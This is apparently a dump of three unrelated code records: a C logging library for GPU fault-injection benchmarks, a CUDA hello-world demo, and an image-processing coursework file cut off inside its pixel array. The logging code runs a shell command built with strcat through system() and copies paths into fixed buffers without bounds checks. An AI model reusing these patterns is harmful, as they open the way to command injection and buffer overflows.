// ~ ===========================================================================
// Set the interval the program must print log details, default is 1 (each iteration)
int set_iter_interval_print(int interval){
    if(interval < 1) {
        iter_interval_print = 1;
    } else {
        iter_interval_print = interval;
    }
    return iter_interval_print;
};

// ~ ===========================================================================
// Update with current timestamp the file where the software watchdog watchs.
// Shells out `echo <epoch> > <watchdog file>` via system().
// NOTE(review): (int)timestamp truncates time_t (2038 issue) and system()
// spawns a shell on every call — confirm both are acceptable here.
void update_timestamp() {
    time_t timestamp = time(NULL);
    char time_s[50];
    char string[100] = "echo ";
    sprintf(time_s, "%d", (int) timestamp);
    strcat(string, time_s);
    strcat(string, " > ");
    strcat(string, timestamp_watchdog);
    system(string);
};

// ~ ===========================================================================
// In case the user needs the log to be generated in some exact absolute path
void set_absolute_path(char *path){
    strcpy(absolute_path, path);
};

// ~ ===========================================================================
// Return the name of the log file generated
char * get_log_file_name(){
    return full_log_file_name;
};

// ~ ===========================================================================
// Generate the log file name, log info from user about the test to be executed and reset log variables.
// Name format: YYYY_MM_DD_hh_mm_ss_<benchmark>_<host>.log under absolute_path.
// Returns 0 on success, 1 on any failure (hostname, file exists, open error).
int start_log_file(char *benchmark_name, char *test_info){
    update_timestamp();
    time_t file_time;
    struct tm *ptm;
    char day[10], month[10], year[15], hour[10], second[10], minute[10];
    // NOTE(review): this local shadows the file-level log_file_name global;
    // the global is therefore never populated by this function.
    char log_file_name[180] = "";
    file_time = time(NULL);
    ptm = gmtime(&file_time);   // UTC timestamp components
    snprintf(day, sizeof(day), "%02d", ptm->tm_mday);
    snprintf(month, sizeof(month), "%02d", ptm->tm_mon+1);
    snprintf(year, sizeof(year), "%04d", ptm->tm_year+1900);
    snprintf(hour, sizeof(hour), "%02d", ptm->tm_hour);
    snprintf(minute, sizeof(minute), "%02d", ptm->tm_min);
    snprintf(second, sizeof(second), "%02d", ptm->tm_sec);

    // ~ Get the host name to add inside the log name.
    char host[35] = "Host";
    int host_error = 0;
    host_error = gethostname(host, 35);
    if (host_error != 0) {
        fprintf(stderr, "[ERROR in gethostname(char *, int)] Could not access the host name\n");
        return 1;
    }

    // Assemble YYYY_MM_DD_hh_mm_ss_<benchmark>_<host>.log
    strcpy(log_file_name, year);
    strcat(log_file_name, "_");
    strcat(log_file_name, month);
    strcat(log_file_name, "_");
    strcat(log_file_name, day);
    strcat(log_file_name, "_");
    strcat(log_file_name, hour);
    strcat(log_file_name, "_");
    strcat(log_file_name, minute);
    strcat(log_file_name, "_");
    strcat(log_file_name, second);
    strcat(log_file_name, "_");
    strcat(log_file_name, benchmark_name);
    strcat(log_file_name, "_");
    strcat(log_file_name, host);
    strcat(log_file_name, ".log");

    strcpy(full_log_file_name, absolute_path);
    // Append a path separator only if absolute_path doesn't already end in one.
    if(strlen(absolute_path) > 0 && absolute_path[strlen(absolute_path)-1] != '/' )
        strcat(full_log_file_name, "/");
    strcat(full_log_file_name, log_file_name);
    // ~ printf("%s\n", full_log_file_name);

    // Refuse to clobber an existing log.
    struct stat buf;
    if (stat(full_log_file_name, &buf) == 0) {
        fprintf(stderr, "[ERROR in create_log_file(char *)] File already exists %s\n",full_log_file_name);
        return 1;
    }

    FILE *file = NULL;
    file = fopen(full_log_file_name, "a");
    if (file == NULL){
        fprintf(stderr, "[ERROR in create_log_file(char *)] Unable to open file %s\n",full_log_file_name);
        return 1;
    }
    else if(test_info != NULL) {
        fprintf(file, "#HEADER %s\n",test_info);
    } else {
        fprintf(file, "#HEADER\n");
    }
    fprintf(file, "#BEGIN Y:%s M:%s D:%s Time:%s:%s:%s\n", year, month, day, hour, minute, second);
    fflush(file);
    fclose(file);

    // Reset the per-run counters.
    kernels_total_errors = 0;
    iteration_number = 0;
    kernel_time_acc = 0;
    return 0;
};

// ~ ===========================================================================
// Log the string "#END" and reset global variables
int end_log_file(){
    FILE *file = NULL;
    file = fopen(full_log_file_name, "a");
    if (file == NULL){
        fprintf(stderr, "[ERROR in log_string(char *)] Unable to open file %s\n",full_log_file_name);
        return 1;
    }
    fprintf(file, "#END");
    fflush(file);
    fclose(file);
    kernels_total_errors = 0;
    iteration_number = 0;
    kernel_time_acc = 0;
    strcpy(log_file_name, "");
    strcpy(absolute_path, "");
    strcpy(full_log_file_name, "");
    return 0;
};

// ~ ===========================================================================
// Start time to measure kernel time, also update iteration number and log to file
// (the per-iteration logging is currently commented out; only the timer starts).
int start_iteration(){
    update_timestamp();
    /* FILE *file = fopen(full_log_file_name, "a"); if (file == NULL){ fprintf(stderr, "[ERROR in log_string(char *)] Unable to open file %s\n",full_log_file_name); return 1; } fprintf(file, "#ITER it:%lu\n", iteration_number); fflush(file); fclose(file); iteration_number++; */
    it_time_start = get_time();
    return 0;
};

// ~ ===========================================================================
// Finish the measured kernel time log both time (total time and kernel time).
// Writes an #IT record every iter_interval_print iterations, then bumps
// iteration_number.
int end_iteration(){
    update_timestamp();

    kernel_time = (double) (get_time() - it_time_start) / 1000000;  // seconds
    kernel_time_acc += kernel_time;

    if(iteration_number % iter_interval_print == 0) {
        FILE *file = fopen(full_log_file_name, "a");
        if (file == NULL){
            fprintf(stderr, "[ERROR in log_string(char *)] Unable to open file %s\n",full_log_file_name);
            return 1;
        }
        fprintf(file,"#IT Ite:%lu KerTime:%f AccTime:%f\n", iteration_number, kernel_time, kernel_time_acc);
        //fprintf(file, "#TIME kernel_time:%f\n", kernel_time);
        //fprintf(file, "#ACC_TIME total_time:%f\n", kernel_time_acc);
        fflush(file);
        fclose(file);
    }
    iteration_number++;
    return 0;
};

// ~ ===========================================================================
// Update total errors variable and log both errors(total errors and kernel errors).
// Writes an #SDC record; calls exit(1) (after #ABORT) when the iteration
// exceeds max_errors_per_iter or when two consecutive iterations report the
// exact same nonzero error count (suspected stuck fault).
int log_error_count(unsigned long int kernel_errors){
    update_timestamp();

    if(kernel_errors < 1) {
        return 0;  // nothing to log
    }
    kernels_total_errors += kernel_errors;

    FILE *file = NULL;
    file = fopen(full_log_file_name, "a");
    if (file == NULL){
        fprintf(stderr, "[ERROR in log_string(char *)] Unable to open file %s\n",full_log_file_name);
        return 1;
    }
    // (iteration_number-1) because this function is called after end_iteration() that increments iteration_number
    fprintf(file, "#SDC Ite:%lu KerTime:%f AccTime:%f KerErr:%lu AccErr:%lu\n", iteration_number-1, kernel_time, kernel_time_acc, kernel_errors, kernels_total_errors);
    //fprintf(file, "#SDC kernel_errors:%lu\n", kernel_errors);
    //fprintf(file, "#TOTAL_SDC total_errors:%lu\n", kernels_total_errors);
    fflush(file);

    if(kernel_errors > max_errors_per_iter){
        fprintf(file, "#ABORT too many errors per iteration\n");
        fflush(file);
        fclose(file);
        end_log_file();
        exit(1);
    }
    if(kernel_errors == last_iter_errors && (last_iter_with_errors+1) == iteration_number && kernel_errors != 0){
        fprintf(file, "#ABORT amount of errors equals of the last iteration\n");
        fflush(file);
        fclose(file);
        end_log_file();
        exit(1);
    }
    fclose(file);

    last_iter_errors = kernel_errors;
    last_iter_with_errors = iteration_number;
    return 0;
};

// ~ ===========================================================================
// Print some string with the detail of an error to log file (as an #ERR line).
int log_error_detail(char *string){
    FILE *file = NULL;
    file = fopen(full_log_file_name, "a");
    if (file == NULL){
        fprintf(stderr, "[ERROR in log_string(char *)] Unable to open file %s\n",full_log_file_name);
        return 1;
    }
    fputs("#ERR ", file);
    fputs(string, file);
    fprintf(file, "\n");
    fflush(file);
    fclose(file);
    return 0;
};
21,461
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <cuda.h>
#include "cuda_runtime.h"
#include "device_launch_parameters.h"

//2015253039

// Kernel: each thread adds its global index back to one character,
// undoing the host-side "str[i] -= i" encoding below. Launched with
// 2 blocks x 6 threads = 12 threads, one per encoded character.
__global__ void helloWorld(char* str)
{
    int idx = blockIdx.x * blockDim.x + threadIdx.x;
    str[idx] += idx;
}

// Demo: prints "Hello", then the scrambled string, then the GPU-restored
// "Hello World!".
int main(int argc, char** argv)
{
    int i;
    char strin[12] = "Hello";
    char str[] = "Hello World!";
    printf("%s", strin);
    // Encode: subtract each character's index; the kernel reverses this.
    // Only the first 12 of the 13 bytes (incl. NUL) are touched.
    for (i = 0; i < 12; i++) {
        str[i] -= i;
    }
    printf("%s\n", str);

    char* d_str;
    size_t size = sizeof(str);  // 13 bytes including the terminating NUL
    cudaMalloc((void**)&d_str, size);
    cudaMemcpy(d_str, str, size, cudaMemcpyHostToDevice);

    dim3 dimBlock(2);   // 2 blocks ...
    dim3 dimThread(6);  // ... of 6 threads: exactly the 12 encoded chars
    helloWorld<<< dimBlock, dimThread >>>(d_str);

    cudaMemcpy(str, d_str, size, cudaMemcpyDeviceToHost);
    cudaFree(d_str);
    printf("%s\n", str);
    return 0;
}
21,462
#include "includes.h" /****************************************************************************** Displays two grey scale images. On the left is an image that has come from an image processing pipeline, just after colour thresholding. On the right is the result of applying an edge detection convolution operator to the left image. This program performs that convolution. Things to note: - A single unsigned char stores a pixel intensity value. 0 is black, 256 is white. - The colour mode used is GL_LUMINANCE. This uses a single number to represent a pixel's intensity. In this case we want 256 shades of grey, which is best stored in eight bits, so GL_UNSIGNED_BYTE is specified as the pixel data type. To compile adapt the code below wo match your filenames: cc -o ip_coursework ip_coursework.c -lglut -lGL -lm Dr Kevan Buckley, University of Wolverhampton, 2018 ******************************************************************************/ #define width 100 #define height 72 unsigned char results[width * height]; unsigned char image[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,255,255,0,0,0,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,255,255,255,255,255,255,255,255,0,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,0,0,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255, 
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,0,255,255,0,255,255,255,255,255,255,255,0,0,0, 0,0,0,0,0,255,255,255,0,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,0,0,0, 0,255,255,255,255,255,255,0,255,255,0,0,0,0,255,255,255,255,255, 0,0,0,0,255,255,255,0,0,0,0,0,0,0,0,0,0,0,255, 255,0,0,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,0, 0,255,255,255,255,255,255,0,0,0,0,255,255,255,255,255,255,255,255, 0,0,0,0,0,0,0,0,0,255,255,255,0,255,0,0,0,0,0, 255,255,255,255,0,0,0,0,0,255,255,255,0,0,0,0,0,0,0, 0,0,0,0,255,255,0,0,0,0,0,0,0,0,0,0,0,0,0, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,0,0,0,0,255,255,255,255,0,0,0,0,0,0,255,255, 255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255, 0,0,0,0,0,255,255,255,0,0,0,0,0,0,255,255,255,0,0, 0,0,0,0,0,0,0,0,0,255,255,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,0,0,0,0,0,0,255,255,255,0,0,0, 0,0,0,255,255,255,255,255,0,0,0,0,0,0,0,0,0,0,0, 0,0,255,255,255,0,0,0,0,0,255,255,0,0,0,0,0,0,255, 255,255,255,0,0,0,0,0,0,0,0,0,0,0,255,255,0,0,0, 
0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,0,0,0,0,0,0,255, 255,255,0,0,0,0,0,0,255,255,255,255,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,255,0,255,0,0,0,0,0,0,255,0,0, 0,0,0,0,255,255,255,255,0,0,0,0,0,255,255,255,255,255,255, 255,255,0,0,0,0,0,0,255,255,0,0,0,0,0,0,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,0, 0,0,0,0,0,255,0,0,0,0,0,0,0,0,255,255,255,0,0, 0,0,0,255,255,255,255,0,0,0,0,0,0,0,255,0,0,0,0, 0,0,0,0,0,0,0,0,255,255,255,255,255,0,0,0,0,0,255, 255,255,255,255,255,255,255,0,0,0,0,0,0,255,255,255,0,0,0, 0,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,0,0,0,0,0,0,0,255,0,0,0,0,0,0,0,0, 255,255,255,0,0,0,0,0,255,255,255,255,255,0,0,0,0,0,0, 255,0,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255,0, 0,0,0,0,255,255,255,255,255,255,255,255,0,0,0,0,0,0,255, 255,255,0,0,0,0,0,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,255,255,255,0,0,0,0,0,255,255,255,255,255,0, 0,0,0,0,0,255,0,0,0,0,0,0,0,0,0,0,0,0,0, 255,255,255,255,0,0,0,0,0,255,255,255,255,255,255,255,255,0,0, 0,0,0,0,255,255,255,0,0,0,0,0,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,255,255,255,0,0,0,0,0,255, 255,255,255,255,0,0,0,0,0,255,255,0,0,0,0,0,0,0,0, 0,0,0,0,0,255,255,255,255,0,0,0,0,0,255,255,255,255,255, 255,255,255,0,0,0,0,0,0,255,255,255,0,0,0,0,0,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,255,255,0, 0,0,0,0,255,255,255,255,0,0,0,0,0,0,255,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,255,255,255,0,0,0,0,0, 255,255,255,255,255,255,255,255,255,0,0,0,0,0,255,0,0,0,0, 0,0,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,255,255,0,0,0,0,0,0,255,255,255,0,0,0,0,0,0, 255,255,0,0,0,0,0,0,255,255,0,0,0,0,0,0,255,255,255, 
0,0,0,0,0,255,255,255,255,255,255,255,255,255,0,0,0,0,0, 0,0,0,0,0,0,0,0,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,255,255,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,255,255,255,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,255,255,255,0,0,0,0,0,255,255,255,255,255,255,255,255,255, 0,0,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,0,0,0,0,0,0,255,0, 0,0,0,0,0,0,255,0,0,0,0,0,255,255,255,0,0,0,0, 0,0,0,0,0,0,0,0,0,255,255,255,0,0,0,0,0,0,0, 0,0,0,0,0,0,255,255,255,255,0,0,0,0,0,255,255,255,255, 255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,0,0,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,0,0, 0,0,0,255,255,0,0,0,0,0,0,255,255,0,0,0,0,0,255, 255,255,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255,0, 0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,0,0,0,0, 0,255,255,255,255,255,255,255,255,255,0,0,0,0,0,0,0,0,0, 0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,0,0,0,0,0,255,255,0,0,0,0,0,0,255,255,0, 0,0,0,0,255,255,255,255,0,0,0,0,0,0,0,0,0,255,255, 255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255, 255,255,0,0,0,0,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,0,0,0,0,0,0,255,255,0,0,0,0, 0,255,255,255,0,0,0,0,0,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 
